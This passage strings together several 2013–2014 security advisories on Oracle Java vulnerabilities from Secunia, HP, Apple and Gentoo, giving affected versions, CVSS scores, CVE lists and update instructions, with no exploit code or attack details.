deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners
| VAR-201302-0184 | CVE-2013-1473 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect integrity via unknown vectors related to Deployment.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior, 6 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-19-1 Java for OS X 2013-001 and Mac OS X v10.6
Update 13
Java for OS X 2013-001 and Mac OS X v10.6 Update 13 is now available
and addresses the following:
Java
Available for: OS X Lion v10.7 or later,
OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities existed in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
These issues were addressed by updating to Java version 1.6.0_41. For
Mac OS X v10.6 systems, these issues were addressed in Java for Mac
OS X v10.6 Update 13. Further information is available via the Java
website at http://www.oracle.com/technetwork/java/javase/
releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java
Description: Multiple vulnerabilities existed in Java, the most
serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
These issues were addressed by updating to Java version 1.6.0_41.
Further information is available via the Java website at http://www.o
racle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1486
CVE-2013-1487
CVE-2013-1488
Malware removal
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description: This update runs a malware removal tool that will
remove the most common variants of malware. If malware is found, it
presents a dialog notifying the user that malware was removed. There
is no indication to the user if malware is not found.
Java for OS X 2013-001 and Java for Mac OS X 10.6 Update 13
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update13.dmg
Its SHA-1 digest is: 5327984bc0b300c237fe69cecf69513624f56b0e
For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-001.dmg
Its SHA-1 digest is: 145d74354241cf2f567d2768bbd0a7185e7d308a
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRI/A/AAoJEPefwLHPlZEwDp4QAKz9nfo397KaudpFDey26bsb
GNR8HQ3Z5Ln0ArgwBcc2XabzIYXsjmY7nPdZgq1m0sWgFGWtfQ7qslRooUyNLOsB
WUddu+hQYvPn3CJOZsaPfTA2mfK6Qk9LeyqzUUkZrRNltHnIFMO7uXLEIdrFdnnx
exFMPjbIq+xM5UZgvd/2grtF4DaZHnbcK+t/tDwH09/hGRQ+l+3a/3FB2S1Av85c
FSuiieyrz2NNnDwFCj5NeSFQuK7hr52TiSOEPYI2eiTepyBHrUy03wAe8uwIzQII
RjkY3Nbc8AZt0Q6lq5TgsQbH+vrwVE07nty36uMKmE2vJXyOAIZjfrrwv9SetLwd
QnU5NYMbeHAHmSN5JQfuvDxEfL15/7Jafw2noJGotdrMzs6XQACFIHKqLORdwNkp
sltj3LwykpcyoCR8Dq7NPafqhp2wySaHX8DFSohcq1aa1w+SLDgPCZUAzknwokCL
f/hVQzP6hD0uHP/2jsLjh5g6TgHmCRdR+CKCs7QZaYAUketelRX9YOcgcXzqf5sy
EcbDvJ+rd3KsQ9gIByGwVhHD87NSZDJAyG0ROjMMS9w/7l7nhGxedzGzlyK3oNl/
VpewgZ8FpUrvY80HOPz5XyFmX+HQoSnJ8er6OI5AvHBPn+Z1yHDLS5zpLeDD/wO9
rmbzMJjZUnlCDXoLEVQ9
=qlVo
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Apple Mac OS X update for Java
SECUNIA ADVISORY ID:
SA52066
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52066/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52066
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52066/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52066/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52066
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Apple has issued an update for Java for Mac OS X. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose certain sensitive information, manipulate certain data,
cause a DoS (Denial of Service), and compromise a vulnerable system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
APPLE-SA-2013-02-01-1:
http://prod.lists.apple.com/archives/security-announce/2013/Feb/msg00000.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
5 affected packages
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below for
details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
